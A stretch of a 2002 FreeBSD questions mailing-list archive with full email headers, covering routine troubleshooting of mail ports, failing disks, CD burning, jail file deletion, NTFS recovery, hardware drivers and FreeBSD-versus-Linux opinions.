------=_NextPart_000_0010_01C21C71.2F4CA6F0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 8:55:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from buffnet4.buffnet.net (buffnet4.buffnet.net [205.246.19.13]) by hub.freebsd.org (Postfix) with ESMTP id 361AB37B401 for ; Tue, 25 Jun 2002 08:55:32 -0700 (PDT) Received: from buffnet11.buffnet.net (buffnet11.buffnet.net [205.246.19.55]) by buffnet4.buffnet.net (8.9.3/8.8.7) with ESMTP id LAA10780; Tue, 25 Jun 2002 11:55:30 -0400 (EDT) (envelope-from shovey@buffnet.net) Date: Tue, 25 Jun 2002 11:55:21 -0400 (EDT) From: Stephen Hovey To: David Banning Cc: questions@FreeBSD.ORG Subject: Re: can't telnet anything on port 25 In-Reply-To: <20020624140920.A22529@skytrackercanada.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Port 25 is smtp (email) On Mon, 24 Jun 2002, David Banning wrote: > I can't seem to telnet any server on port 25; > > su-2.03# telnet skytrackercanada.com 25 > Trying 209.188.66.29... > telnet: connect to address 209.188.66.29: Operation timed out > telnet: Unable to connect to remote host > su-2.03# > > > I can telnet using the default port just fine, and others can telnet > into the machine, but it always gets this message no matter > who I telnet. > > Am I missing something? What services, if any need to be running to get > this operating? > > I do not have a firewall running. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 8:56:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from yeoman.sinbad.net (yeoman.sinbad.net [12.17.176.5]) by hub.freebsd.org (Postfix) with ESMTP id 8724D37B408 for ; Tue, 25 Jun 2002 08:56:06 -0700 (PDT) Received: from there (95-7-237-24-cable.anchorageak.net [24.237.7.95]) by yeoman.sinbad.net (Postfix) with SMTP id 0CA6C20E93; Tue, 25 Jun 2002 07:56:00 -0800 (AKDT) Content-Type: text/plain; charset="iso-8859-1" From: Beech Rintoul Reply-To: akbeech@sinbad.net To: "ro0t" , Subject: Re: any idea what this means? Date: Tue, 25 Jun 2002 07:55:59 -0800 X-Mailer: KMail [version 1.3] References: In-Reply-To: Organization: Sinbad Network Communications MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <20020625155600.0CA6C20E93@yeoman.sinbad.net> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Monday 24 June 2002 11:53 pm, ro0t wrote: > On Monday 24 June 2002 11:13 pm, ro0t wrote: > > ad0s1d: hard error reading fsbn 135917743 of 29169720-29169723 (ad0s1 bn > 135917743; cn 8460 tn 124 sn 31) status=59 error=40 > I have never gotten this error before, is it the hard disk failing? if so > why is it just one partition doing it? please respond to > root@unixhideout.com as i am not on the list. Thanks. > > > That's not a good sign. It's not unusual for HD problems to start on one > partition. I would back up your drive and also check your cables for > tightness. > > Beech > > > Well i figured it wasn't a good sign. I tried "badsect" and it didnt do > me much good. I just hate to toss a 60 gig drive in the trash. But now more > blocks are just failing. This system has been running a year without any > errors. When i bought the motherboard, i bought the "ABIT KT7A-RAID" for > future plans, looks like the future is now. ill buy dual drives and raid it > up. Now im only left with the decision of whether to buy yet *more* maxtor > drives. It appears at least from my experience that the only hard drives > that permanently die on me in what seems a short time is maxtor drives.. My > seagate is still kicking like a champ. Any suggestions on what new brand i > buy? =] And lastly thanks for your response. > I would also recommend Seagate, they seem to hold up better in production machines than do Maxtor. Above all stay away from IBM. We have three of them that were bad almost right from the box, and IBM is not being nice about replacing them. I have beter things to do than a myriad of tests just to get an RMA. Being new drives I figure they should give us the benefit of the doubt and test them themselves. One they did replace had bad sectors right out of the box. Beech -- ------------------------------------------------------------------- Beech Rintoul - SysAdmin - akbeech@sinbad.net /"\ ASCII Ribbon Campaign | Sinbad Network Communications \ / - NO HTML/RTF in e-mail | 3101 Penland Parkway #K-38 X - NO Word docs in e-mail | Anchorage, AK 99508-1957 / \ ----------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 9: 2:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from ece.ufl.edu (dot.ece.ufl.edu [128.227.220.22]) by hub.freebsd.org (Postfix) with SMTP id 48F5F37B4A9 for ; Tue, 25 Jun 2002 09:00:51 -0700 (PDT) Received: (qmail 10612 invoked from network); 25 Jun 2002 15:58:03 -0000 Received: from casper.ece.ufl.edu (128.227.180.133) by dot.ece.ufl.edu with SMTP; 25 Jun 2002 15:58:03 -0000 Date: Tue, 25 Jun 2002 12:05:00 -0400 (EDT) From: jason kawaja To: questions@freebsd.org Subject: [burncd] remove two second space Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG greetings. - freebsd 4.5 is there a way to remove the automatic two second space between tracks when using burncd to record an audio cd? (without combining all tracks into one large one) polite nudges to a better suited area are appreciated. /* Regards, Jason Kawaja, UF-ECE Sys Admin */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 9: 3:29 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.cics.co.za (mail.cics.co.za [196.15.196.10]) by hub.freebsd.org (Postfix) with ESMTP id 52A6537B4CE for ; Tue, 25 Jun 2002 09:02:09 -0700 (PDT) Received: (qmail 1037 invoked by uid 85); 25 Jun 2002 16:05:28 -0000 Received: from unknown (HELO mark.igate.org.za) (196.15.196.5) by mail.cics.co.za with SMTP; 25 Jun 2002 16:05:27 -0000 Date: Tue, 25 Jun 2002 18:01:43 +0200 From: Mark Pearce To: freebsd-questions@FreeBSD.ORG Subject: How do I delete files used in a jail Message-Id: <20020625180143.768902ff.mark@netchat.co.za> Organization: Netchat X-Mailer: Sylpheed version 0.7.6claws (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi I am trying to delete some directories that I was using within a jail a while back. I try deleting and this is the errors I get: Any ideas why ? Thanks Mark [06:01pm root@mark 10]# rm -rf jail rm: jail/bin/rcp: Operation not permitted rm: jail/bin: Directory not empty rm: jail/sbin/init: Operation not permitted rm: jail/sbin: Directory not empty rm: jail/usr/bin/cu: Operation not permitted rm: jail/usr/bin/uucp: Operation not permitted rm: jail/usr/bin/uuname: Operation not permitted rm: jail/usr/bin/uustat: Operation not permitted rm: jail/usr/bin/uux: Operation not permitted rm: jail/usr/bin/man: Operation not permitted rm: jail/usr/bin/chpass: Operation not permitted rm: jail/usr/bin/chfn: Operation not permitted rm: jail/usr/bin/chsh: Operation not permitted rm: jail/usr/bin/ypchpass: Operation not permitted rm: jail/usr/bin/ypchfn: Operation not permitted rm: jail/usr/bin/ypchsh: Operation not permitted rm: jail/usr/bin/login: Operation not permitted rm: jail/usr/bin/passwd: Operation not permitted rm: jail/usr/bin/yppasswd: Operation not permitted rm: jail/usr/bin/rlogin: Operation not permitted rm: jail/usr/bin/rsh: Operation not permitted rm: jail/usr/bin/su: Operation not permitted rm: jail/usr/bin/tip: Operation not permitted rm: jail/usr/bin/crontab: Operation not permitted rm: jail/usr/bin: Directory not empty rm: jail/usr/lib/libcrypt.so.2: Operation not permitted rm: jail/usr/lib/libc.so.4: Operation not permitted rm: jail/usr/lib/libc_r.so.4: Operation not permitted rm: jail/usr/lib/libcipher.so.2: Operation not permitted rm: jail/usr/lib: Directory not empty rm: jail/usr/libexec/ld-elf.so.1: Operation not permitted rm: jail/usr/libexec: Directory not empty rm: jail/usr/sbin/sliplogin: Operation not permitted rm: jail/usr/sbin: Directory not empty rm: jail/usr: Directory not empty rm: jail: Directory not empty [06:01pm root@mark 10]# To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 9: 5:12 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web11607.mail.yahoo.com (web11607.mail.yahoo.com [216.136.172.59]) by hub.freebsd.org (Postfix) with SMTP id 7BC7137B401 for ; Tue, 25 Jun 2002 09:05:08 -0700 (PDT) Message-ID: <20020625160507.98186.qmail@web11607.mail.yahoo.com> Received: from [62.172.135.161] by web11607.mail.yahoo.com via HTTP; Tue, 25 Jun 2002 09:05:06 PDT Date: Tue, 25 Jun 2002 09:05:06 -0700 (PDT) From: Suzy Clarke Subject: UAAC Protocol To: freebsd-questions@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi all, This is not directly related to FreeBSD but ... Within FreeBSD's /etc/services file there's a protocol defined as UAAC which uses TCP and UDP port 145. Does anyone have any idea what this service is legitimately used for? [I know that the XC telnetd worm that came out last year used TCP port 145 for a rootshell backdoor but I'm looking for its "official" use] I've checked the RFCs and done a Google search but they haven't turned up anything. In several port listings a David Gomberg at Mitre [gomberg@gateway.mitre.org] is listed as the contact for this service but mail to that address bounces. I was also referred to him by IANA. Does anyone have an alternate email for him? If you've got any ideas or info please email me directly. Thanks, Suzy __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 9:20:38 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 5ADA237B400 for ; Tue, 25 Jun 2002 09:20:29 -0700 (PDT) Received: 8.12.2-(Neptune) From: "Nielsen" To: "Akthar Hussain" , References: Subject: Re: Great FreeBSD MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020625162029.5ADA237B400@hub.freebsd.org> Date: Tue, 25 Jun 2002 09:20:29 -0700 (PDT) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I threw one together a while back when I had probs. It's rough but it works. http://memberwebs.com/nielsen/windows/scrounge/ Hope it helps. Nate ----- Original Message ----- From: "Akthar Hussain" To: Sent: Tuesday, June 25, 2002 0:11 Subject: Great FreeBSD > Hi, > > Yesterday my NTFS (NT 4.0) server hard disk crashed .i am nable to read any > data from that NT Drive.I connected NTFS drive in other 2 , 3 Windows system > as slave but no yse Win200 and NT 4.0 won't recogniz the hard disk. > > But in Great freebsd i mounded successfull the crashed NTFS hard disk.Also i > recoverd most of the data . > > But still i need to recover 2 more files from that failure hard disk .but i > am unable to recover it from . > > If anybady knows good share ware recovery tools to recover my data from NTFS > plsase let me know,. > > Thanks....... > ah > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 9:30:19 2002 Delivered-To: freebsd-questions@freebsd.org Received: from rwcrmhc52.attbi.com (rwcrmhc52.attbi.com [216.148.227.88]) by hub.freebsd.org (Postfix) with ESMTP id B678A37B400 for ; Tue, 25 Jun 2002 09:30:08 -0700 (PDT) Received: from glitch ([66.31.64.203]) by rwcrmhc52.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP id <20020625163004.BWLB8262.rwcrmhc52.attbi.com@glitch> for ; Tue, 25 Jun 2002 16:30:04 +0000 Message-ID: <001f01c21c65$975fd570$010a010a@glitch> From: "Proximity" To: Subject: HELP! BSD Date: Tue, 25 Jun 2002 12:30:15 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_001C_01C21C44.0F28C840" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_001C_01C21C44.0F28C840 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable You guys support nVidia nForce ATA 100 Controllers why not the = integrated sound video and ethernet??? I really need the integrated stuff to be supported or else i cant use = BSD now thats depressing so im begging you guys the nVidia nForce = chipset and hardware has been rated #1 in a view magazines so people = will be picking up on it and Honestly without your driver support i cant = use BSD so please guys make some drivers for it im begging you ------=_NextPart_000_001C_01C21C44.0F28C840 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
You guys support nVidia nForce ATA 100 = Controllers=20 why not the integrated sound video and ethernet???
 
I really need the integrated stuff to = be supported=20 or else i cant use BSD now thats depressing so im begging you guys the = nVidia=20 nForce chipset and hardware has been rated #1 in a view magazines so = people will=20 be picking up on it and Honestly without your driver support i cant use = BSD so=20 please guys make some drivers for it im begging = you
------=_NextPart_000_001C_01C21C44.0F28C840-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 9:36: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from kramer.thekramers.net (dsl092-068-235.bos1.dsl.speakeasy.net [66.92.68.235]) by hub.freebsd.org (Postfix) with ESMTP id 9B90137B400 for ; Tue, 25 Jun 2002 09:35:55 -0700 (PDT) Received: from localhost (david@localhost) by kramer.thekramers.net (8.11.6/8.11.0) with ESMTP id g5PGZqw26019; Tue, 25 Jun 2002 12:35:53 -0400 Date: Tue, 25 Jun 2002 12:35:52 -0400 (EDT) From: David Kramer To: jason kawaja Cc: questions@FreeBSD.ORG Subject: Re: [burncd] remove two second space In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, jason kawaja wrote: > greetings. > > - freebsd 4.5 > > is there a way to remove the automatic two second space between tracks > when using burncd to record an audio cd? (without combining all tracks > into one large one) > > polite nudges to a better suited area are appreciated. You have to use disk-at-once mode to get rid of the gap. ---------------------------------------------------------------------------- DDDD David Kramer david@thekramers.net http://thekramers.net DK KD "The water was not fit to drink. DKK D To make it palatable, we had to add whiskey. DK KD By diligent effort, I learned to like it." DDDD - Sir Winston Churchill (1874-1965) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 9:47: 9 2002 Delivered-To: freebsd-questions@freebsd.org Received: from kramer.thekramers.net (dsl092-068-235.bos1.dsl.speakeasy.net [66.92.68.235]) by hub.freebsd.org (Postfix) with ESMTP id 74B0337B400 for ; Tue, 25 Jun 2002 09:47:03 -0700 (PDT) Received: from localhost (david@localhost) by kramer.thekramers.net (8.11.6/8.11.0) with ESMTP id g5PGl2A26100 for ; Tue, 25 Jun 2002 12:47:02 -0400 Date: Tue, 25 Jun 2002 12:47:02 -0400 (EDT) From: David Kramer To: freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris In-Reply-To: <3D1877F9.9040305@rambo.simx.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, Roger 'Rocky' Vetterberg wrote: > This is of course a question of personal taste, but I would > probably choose FreeBSD. On small or medium size networks and on > x86 hardware I find it hard to beat fbsd's performance. > Linux is gaining performance wise, they have made some > significant improvements lately, but Linux still gives me an icky > feeling. I just cant sleep well at night if I have to trust Linux > to run my servers. I'm curious about this. Performance is something that can be measured, but what about Linux makes you feel "icky"? I ask, because I'm going to be building a new server at home in a few weeks (firewall/ipmasq/web/mail/ftp/ssh/couple users). I'm a long-time Linux user, but now I'm using FreeBSD a lot from work. I've been considering using FreeBSD instead of Linux for the new server, but I'm having trouble finding *recent* *objective* advantages to one over the other. For instance, I know the FreeBSD TCP/IP stack was much tighter and more secure in the past, but I don't know if that's still the case. So I would be interested in hearing any objective advantages of FreeBSD over Linux. DISCLAIMER: I just signed up for about 8 of the FreeBSD mailing lists a few days ago to try to get a handle on this. This question may be more appropriate for -advocacy, but I haven't seen a single post on there, so I don't know whether it's really alive or not. If I really should post there, though, please correct me. Thanks. ---------------------------------------------------------------------------- DDDD David Kramer david@thekramers.net http://thekramers.net DK KD "The water was not fit to drink. DKK D To make it palatable, we had to add whiskey. DK KD By diligent effort, I learned to like it." DDDD - Sir Winston Churchill (1874-1965) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 9:49:11 2002 Delivered-To: freebsd-questions@freebsd.org Received: from ece.ufl.edu (dot.ece.ufl.edu [128.227.220.22]) by hub.freebsd.org (Postfix) with SMTP id 1E82437B401 for ; Tue, 25 Jun 2002 09:49:02 -0700 (PDT) Received: (qmail 11989 invoked from network); 25 Jun 2002 16:46:13 -0000 Received: from casper.ece.ufl.edu (128.227.180.133) by dot.ece.ufl.edu with SMTP; 25 Jun 2002 16:46:13 -0000 Date: Tue, 25 Jun 2002 12:53:11 -0400 (EDT) From: jason kawaja To: questions@FreeBSD.ORG Subject: Re: [burncd] remove two second space In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, David Kramer wrote: > On Tue, 25 Jun 2002, jason kawaja wrote: > > > is there a way to remove the automatic two second space between tracks > > when using burncd to record an audio cd? (without combining all tracks > > into one large one) > > You have to use disk-at-once mode to get rid of the gap. ok. using the '-d' option i now have the following on stdout : only wrote -1 of 37632 bytes err=5 and on /dev/console : acd0: WRITE_BIG - ILLEGAL REQUEST asc=0x24 ascq=0x00 error=0x04 any ideas? i believe my plextor 24/10/40a is dao capable. /* Regards, Jason Kawaja, UF-ECE Sys Admin */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 9:56:36 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailgate.sri.com (mailgate.SRI.COM [128.18.243.11]) by hub.freebsd.org (Postfix) with SMTP id 236FA37B404 for ; Tue, 25 Jun 2002 09:56:29 -0700 (PDT) Received: (qmail 20311 invoked from network); 25 Jun 2002 16:56:06 -0000 Received: from localhost (HELO mailgate.SRI.COM) (127.0.0.1) by mailgate.sri.com with SMTP; 25 Jun 2002 16:56:06 -0000 Received: from quarter.csl.sri.com ([130.107.1.30]) by mailgate.SRI.COM (NAVGW 2.5.1.18) with SMTP id M2002062509560502320 ; Tue, 25 Jun 2002 09:56:05 -0700 Received: from axp.csl.sri.com (axp.csl.sri.com [130.107.2.30]) by quarter.csl.sri.com (8.12.4/8.12.4) with ESMTP id g5PGuS46007789; Tue, 25 Jun 2002 09:56:28 -0700 Received: from axp.csl.sri.com (localhost [127.0.0.1]) by axp.csl.sri.com (8.12.3/8.11.6) with ESMTP id g5PGuPqL028022; Tue, 25 Jun 2002 09:56:28 -0700 (PDT) (envelope-from hogsett@axp.csl.sri.com) Message-Id: <200206251656.g5PGuPqL028022@axp.csl.sri.com> To: David Kramer Cc: freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris In-Reply-To: Message from David Kramer of "Tue, 25 Jun 2002 12:47:02 EDT." Mime-Version: 1.0 (generated by tm-edit 8.8 (Time Passed Me By)) Content-Type: text/plain; charset=US-ASCII Date: Tue, 25 Jun 2002 09:56:25 -0700 From: Mike Hogsett Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG From my experience of managing about 50 Linux workstations, about 5 Linux servers and about 8 FreeBSD servers I find that the FreeBSD boxen are much, much, much simpler to upgrade and keep current. (e.g. cvsup) and I find that they are more stable. I like the fact that FreeBSD manages the whole OS rather than the hodgepodge of packages that are munged together to make any particular Linux distribution. I trust it more to work. Finding and installing packages is also much simpler (e.g. /usr/ports) than locating some arbitrary RPM and hoping that it is linked against the libraries you have or that it hasn't got any other dependencies. (I know I know I can compile from source on Linux too, but I have to track down the dependencies manually). Also I sort of figure that if it aint in /usr/ports it aint worth having. My $.02 - Mike Hogsett > On Tue, 25 Jun 2002, Roger 'Rocky' Vetterberg wrote: > > > This is of course a question of personal taste, but I would > > probably choose FreeBSD. On small or medium size networks and on > > x86 hardware I find it hard to beat fbsd's performance. > > Linux is gaining performance wise, they have made some > > significant improvements lately, but Linux still gives me an icky > > feeling. I just cant sleep well at night if I have to trust Linux > > to run my servers. > > I'm curious about this. Performance is something that can be measured, > but what about Linux makes you feel "icky"? > > I ask, because I'm going to be building a new server at home in a few > weeks (firewall/ipmasq/web/mail/ftp/ssh/couple users). I'm a long-time > Linux user, but now I'm using FreeBSD a lot from work. I've been > considering using FreeBSD instead of Linux for the new server, but I'm > having trouble finding *recent* *objective* advantages to one over the > other. For instance, I know the FreeBSD TCP/IP stack was much tighter and > more secure in the past, but I don't know if that's still the case. > > So I would be interested in hearing any objective advantages of FreeBSD > over Linux. > > DISCLAIMER: I just signed up for about 8 of the FreeBSD mailing lists a > few days ago to try to get a handle on this. This question may be more > appropriate for -advocacy, but I haven't seen a single post on there, so I > don't know whether it's really alive or not. If I really should post > there, though, please correct me. > > Thanks. > ---------------------------------------------------------------------------- > DDDD David Kramer david@thekramers.net http://thekramers.net > DK KD "The water was not fit to drink. > DKK D To make it palatable, we had to add whiskey. > DK KD By diligent effort, I learned to like it." > DDDD - Sir Winston Churchill (1874-1965) > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 9:58:45 2002 Delivered-To: freebsd-questions@freebsd.org Received: from anchor-post-35.mail.demon.net (anchor-post-35.mail.demon.net [194.217.242.85]) by hub.freebsd.org (Postfix) with ESMTP id 397B837B40C for ; Tue, 25 Jun 2002 09:58:38 -0700 (PDT) Received: from caomhin.demon.co.uk ([62.49.21.186]) by anchor-post-35.mail.demon.net with esmtp (Exim 3.36 #2) id 17MteG-0005EG-0U; Tue, 25 Jun 2002 17:58:37 +0100 Message-ID: Date: Tue, 25 Jun 2002 17:56:57 +0100 To: Proximity Cc: freebsd-questions@freebsd.org From: Kevin Golding Subject: Re: HELP! BSD References: <001f01c21c65$975fd570$010a010a@glitch> In-Reply-To: <001f01c21c65$975fd570$010a010a@glitch> MIME-Version: 1.0 X-Mailer: Turnpike Integrated Version 5.01 U Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Someone, quite probably Proximity, once wrote: > You guys support nVidia nForce ATA 100 Controllers why not the > integrated sound video and ethernet??? Because nVidia won't release the specs. http://nvidia.netexplorer.org/ >Honestly without your driver > support i cant use BSD so please guys make some drivers for it im > begging you Certainly with the video cards you can still use them if not to their full potential. Look at the website above and see if that'll help any though. Kevin -- kevin@caomhin.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 10: 2:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by hub.freebsd.org (Postfix) with ESMTP id 66CEA37B401 for ; Tue, 25 Jun 2002 10:01:48 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by cactus.fi.uba.ar (8.11.6/8.11.6) with ESMTP id g5PH0BP14216; Tue, 25 Jun 2002 14:00:11 -0300 (ART) (envelope-from fgleiser@cactus.fi.uba.ar) Date: Tue, 25 Jun 2002 14:00:11 -0300 (ART) From: Fernando Gleiser X-X-Sender: To: David Kramer Cc: Subject: Re: FreeBSD, Linux or Solaris In-Reply-To: Message-ID: <20020625135153.M403-100000@localhost> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, David Kramer wrote: > On Tue, 25 Jun 2002, Roger 'Rocky' Vetterberg wrote: > > I ask, because I'm going to be building a new server at home in a few > weeks (firewall/ipmasq/web/mail/ftp/ssh/couple users). I'm a long-time > Linux user, but now I'm using FreeBSD a lot from work. I've been > considering using FreeBSD instead of Linux for the new server, but I'm > having trouble finding *recent* *objective* advantages to one over the > other. For instance, I know the FreeBSD TCP/IP stack was much tighter and > more secure in the past, but I don't know if that's still the case. Well. I don't have any problems with the linux kernel itself, but I haven't found a distro I like as much as freebsd. That said, if a client wants RedHat or Debian or whatever, I'll install that. =0) The main reasons I like FreeBSD over Linux are: 1. I like ipf or ipfw better than ipchains/netfilter 2. I like ports system better than rpm or deb 3. I like the feeling of a 'whole OS' instead of a kernel and a bunch of apps put together by a vendor. 4. No 'libc of the week' As you see, they are subjetive, so YMMV. > Fer > So I would be interested in hearing any objective advantages of FreeBSD > over Linux. > > DISCLAIMER: I just signed up for about 8 of the FreeBSD mailing lists a > few days ago to try to get a handle on this. This question may be more > appropriate for -advocacy, but I haven't seen a single post on there, so I > don't know whether it's really alive or not. If I really should post > there, though, please correct me. > > Thanks. > ---------------------------------------------------------------------------- > DDDD David Kramer david@thekramers.net http://thekramers.net > DK KD "The water was not fit to drink. > DKK D To make it palatable, we had to add whiskey. > DK KD By diligent effort, I learned to like it." > DDDD - Sir Winston Churchill (1874-1965) > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 10: 8:31 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.melim.com.br (salseiros.melim.com.br [200.215.110.23]) by hub.freebsd.org (Postfix) with ESMTP id DBBDB37B400 for ; Tue, 25 Jun 2002 10:08:21 -0700 (PDT) Received: from praiadosamores.melim.com.br (praiadosamores.melim.com.br [200.215.110.20]) by mail.melim.com.br (Postfix) with SMTP id 0FEE2BB1A; Tue, 25 Jun 2002 14:08:16 -0300 (BRT) Date: Tue, 25 Jun 2002 14:08:15 -0300 From: Ronan Lucio To: "Fanny Bellone" Cc: freebsd-questions@FreeBSD.ORG Subject: Re: Bridge with Firewalling Message-Id: <20020625140815.17143e87.ronanl@melim.com.br> In-Reply-To: <001301c21c60$6bd62670$23e8fac2@fanny> References: <001301c21c60$6bd62670$23e8fac2@fanny> Organization: Melim Internet X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002 17:53:17 +0200 "Fanny Bellone" wrote: > Hi, Hi, > I've an Advantec Server, with 2 ethernet ports and 1 ethernet port on PCI card. > > This server is a bi-processor, 2 x INTEL PENTIUM III 1GHZ. First I'd like to say You don't need so big hardware to create just a bridge. What are the output for: #sysctl -a | grep bridge ? []'s Ronan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 10:10:22 2002 Delivered-To: 